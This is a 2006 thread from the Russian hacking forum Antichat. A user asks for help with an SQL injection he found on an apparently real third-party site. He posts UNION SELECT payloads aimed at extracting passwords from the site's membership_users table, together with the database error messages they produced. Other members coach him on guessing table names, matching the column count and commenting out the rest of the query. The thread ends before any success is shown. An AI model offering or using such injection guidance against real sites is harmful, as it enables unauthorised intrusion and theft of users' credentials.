Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
09.03.2006, 14:16
|
|
Новичок
Регистрация: 09.03.2006
Сообщений: 3
Провел на форуме:
7348
Репутация:
0
|
|
И снова sql иньекция
Нашол вот такую афигительную sql иньекцию:
Код:
[SELECT failed in SQL: SELECT id, parentid, name FROM membership_categories WHERE id = 2 union select null,null,null from admin] ( 1146 : Table 'igor987_studio.admin' doesn't exist )
Немогу таблицу с админкой прошупать, уже вариантов 20 попробывал, админка там точно есть с юзерами, у кого какие вварианты есть? |
|
|
09.03.2006, 14:34
|
|
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226
Репутация:
1332
|
|
видишь префикс membership_ ? ну попробуй с ним че нить намутить. таблица admin - на самом деле маловероятно... попробуй просто user,users (с префиксом).
|
|
|
|
09.03.2006, 14:39
|
|
ВАША реклама ТУТ!!
Регистрация: 01.07.2005
Сообщений: 647
Провел на форуме:
3478464
Репутация:
714
|
|
admin_users встречал
__________________
My ICQ: 296@463@859 ONLY!! Please check your list!!
И здесь могла бы быть ВАША реклама!!!
|
|
|
|
09.03.2006, 14:53
|
|
Новичок
Регистрация: 09.03.2006
Сообщений: 3
Провел на форуме:
7348
Репутация:
0
|
|
Блин нашол вот такая фигня вылазит
Код:
[SELECT failed in SQL: SELECT COUNT(*) FROM membership_categories WHERE parentid=2 union select null,null,password from membership_users AND enabled=1] ( 1064 : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND enabled=1' at line 1 )
А после того как экранирую, такая
[SELECT failed in SQL: SELECT id, parentid, name FROM membership_categories WHERE id = 2 union select null,null,password from membership_users*/] ( 1064 : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '*/' at line 1 ) |
|
|
|
09.03.2006, 15:22
|
|
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226
Репутация:
1332
|
|
бля нахуя тебе тут что-то эранировать тем более неправильно?
1)у тебя кол-во столбцов из второго слеекта должно быть равно кол-ву столбцов из первого, то есть один
2)твои коментарии должны выглядить так или с дальнейшими вопрjсами на mysql.ru |
|
|
|
09.03.2006, 17:18
|
|
Новичок
Регистрация: 09.03.2006
Сообщений: 3
Провел на форуме:
7348
Репутация:
0
|
|
Код:
[SELECT failed in SQL: SELECT id, parentid, name FROM membership_categories WHERE id = 2 union select 0 from membership_users/*] ( 1222 : The used SELECT statements have a different number of columns )
Блин вставляю одно поле, он показывает что с базы выгрибает три, ставлю три поля показывает, как я рание писал, что за фигня? подскажитес.... |
|
|
|
09.03.2006, 19:49
|
Регистрация: 18.02.2006
Сообщений: 1,090
Провел на форуме:
6489333
Репутация:
1564
|
|
Сообщение от Spaiojek
Код:
[SELECT failed in SQL: SELECT id, parentid, name FROM membership_categories WHERE id = 2 union select 0 from membership_users/*] ( 1222 : The used SELECT statements have a different number of columns )
Блин вставляю одно поле, он показывает что с базы выгрибает три, ставлю три поля показывает, как я рание писал, что за фигня? подскажитес.... Напиши Задохлику в асю, он в этом хорошо шарит...
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
